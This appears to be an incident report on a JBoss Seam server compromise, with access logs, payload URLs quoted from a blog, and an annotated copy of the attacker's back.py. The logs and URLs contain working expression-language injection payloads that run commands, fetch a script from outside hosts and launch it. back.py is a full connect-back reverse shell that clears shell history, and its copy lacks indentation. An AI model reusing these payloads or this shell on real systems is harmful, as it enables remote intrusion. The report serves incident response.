Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.
I have not found anything to show this has been reported previously. I have not yet reproduced it and am still working on fully understanding the exploit.
== server.log ==
2012-05-22 13:53:10,198 36426506 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:10,198 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
2012-05-22 13:53:16,595 36432903 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:16,595 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
== httpd.log with pertinent sections grouped ==
/*
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/extranet.css HTTP/1.1" 200 10799
115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/js/site.js HTTP/1.1" 200 539
115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842
*/
115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555
115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:39 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
115.238.137.24 - - [22/May/2012:13:53:43 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')} HTTP/1.1" 302 -
115.238.137.24 - - [22/May/2012:13:53:44 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979
/*
115.238.137.24 - - [22/May/2012:13:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 988
*/
Discovered the following information in some searches:
== http://erro.sinaapp.com/?p=47 ==
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’)}.getDeclaredMethods()[13]}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py’)}
http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘perl /tmp/back.py 118.122.176.42 53′)}
== back.py ==
#!/usr/bin/python
import sys
import os
import socket
import pty
# Program handed to pty.spawn() in main(); a /bin/sh child of a python process
# running under the jboss account is the process-tree anomaly to look for.
shell = "/bin/sh"
def usage(programname):
# Banner and argument order; only reached from main() when the argument
# count check fails.
print "Python connect-back door"
print "Usage: %s <conn_back_ip> <port>" % programname
def main():
# IR annotations (reviewer): behaviour is described only as far as these
# lines show it. Expects exactly two arguments: a host to connect back to
# and a port.
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit(1)
# Outbound TCP connection from the compromised host to argv[1]:argv[2].
# The httpd.log above shows it launched as 'python /tmp/back.py <host> 28',
# so an egress connection to that destination from the jboss account is
# the network indicator to hunt for.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
print "[+]Connect OK."
except:
print "[-]Can't connect"
sys.exit(2)
# stdin, stdout and stderr of this process are redirected onto the socket,
# so everything the spawned shell reads and writes travels over that
# connection.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
# History-related environment variables are cleared before the shell
# starts; do not expect the jboss account's shell history to record this
# session.
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
# Interactive shell on a pseudo-terminal, attached to the socket through the
# dup2 calls above.
pty.spawn(shell)
s.close()
# NOTE(review): the rendering has eaten the double underscores here (and
# probably elsewhere in this listing, including all indentation), so treat
# this as an approximate transcript and analyse the file actually written to
# /tmp/back.py on the host rather than this copy.
if _name_ == "_main_":
main()